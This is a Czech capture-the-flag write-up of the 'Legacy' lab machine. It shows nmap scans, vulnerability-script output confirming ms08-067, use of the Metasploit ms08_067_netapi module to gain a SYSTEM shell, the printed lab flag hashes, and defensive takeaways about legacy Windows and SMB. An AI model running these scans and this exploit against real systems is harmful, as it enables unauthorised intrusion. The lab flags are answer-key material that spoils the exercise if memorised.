Legacy
Úvod a kontext
Legacy je podobně jako Lame starý stroj, kde rozhoduje hlavně správná interpretace bannerů. nmap velmi rychle ukáže Windows XP a SMB stack z éry ms08-067, takže článek je spíš rozborem dopadu historicky nepatchované služby než složitého vícekrokového řetězce.
To je na Legacy užitečné. Není potřeba hledat web, credentials ani laterální pohyb. Jakmile se potvrdí ms08-067, jde o přímý síťový exploit vedoucí rovnou k SYSTEM.
Počáteční průzkum
Windows XP a starý SMB stack
První scan ukáže prakticky všechno podstatné: host běží na Windows XP, SMB signing není vynucené a povrch se omezuje téměř výhradně na NetBIOS/SMB.
ports=$(nmap -p- --min-rate=1000 -T4 -Pn $IP | grep ^[0-9] | cut -d "/" -f 1 | tr "\n" "," | sed s/,$//);echo $ports;nmap -p $ports -A -sC -sV -v -Pn $IP
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP
Potvrzení ms08-067
Druhý nmap s vuln skripty už jen potvrzuje, co naznačoval základní banner: cílový SMB stack je zasažený ms08-067. ms17-010 se sice také testuje, ale na starém XP hostu je rozhodující právě starší netapi chyba.
nmap -p $ports -n -v -A -sC -sV -Pn --script *enum*,*vuln* $IP
| smb-vuln-ms08-067:
| smb-vuln-ms17-010:
Analýza zjištění
Proč právě ms08_067_netapi
V případě Legacy není důvod komplikovat si práci. Metasploit modul windows/smb/ms08_067_netapi je pro tenhle typ hostu nejpřímější a nejspolehlivější cesta. Jakmile banner i NSE skripty sedí na Windows XP s tímto SMB stackem, je to přesně exploit, který dává smysl zkusit jako první.
Získání přístupu
Síťový exploit proti SMB
Po spuštění ms08_067_netapi vznikne shell rovnou v privilegovaném kontextu. Tím se znovu potvrzuje, jak vysoký dopad měla tehdejší chyba v SMB implementaci Windows.
msf5 exploit(windows/smb/ms08_067_netapi)
more user.txt
e69af0e4f443de7e36876fda4ec7644f
Eskalace oprávnění
Shell už běží jako SYSTEM
Stejně jako u lame tu ve skutečnosti není samostatná root/admin fáze. Síťový exploit už vrací proces s dostatečnými oprávněními, takže zbývá jen potvrdit plný dopad čtením root.txt.
more root.txt
993442d258b0e0ec917cae9e695d5713
Shrnutí klíčových poznatků
- Legacy je o správném přečtení technologie, ne o dlouhé enumeraci. Windows XP a SMB jsou tady samy o sobě prakticky diagnózou.
ms08-067dává přímou cestu k shellu, takže nepotřebuje žádný mezikrok přes credentials nebo web.- Dopad je maximální: síťový bug v SMB se mění přímo v SYSTEM, bez další lokální eskalace.
Co si odnést do praxe
- Historické chyby jako
ms08-067neztrácejí závažnost jen proto, že jsou staré. Pokud podobný host zůstane v síti, útok je i po letech triviální. - Inventarizace starých Windows systémů je zásadní. Legacy ukazuje, že samotná přítomnost Windows XP na síti je bezpečnostní problém, i kdyby na něm neběžela žádná „moderní“ aplikace.
- Síťové protokoly typu SMB musí být u starých systémů izolované, nebo úplně odstraněné z dosahu. Jakmile je podobný stroj vystavený, kompromitace už neprobíhá po krocích, ale prakticky okamžitě.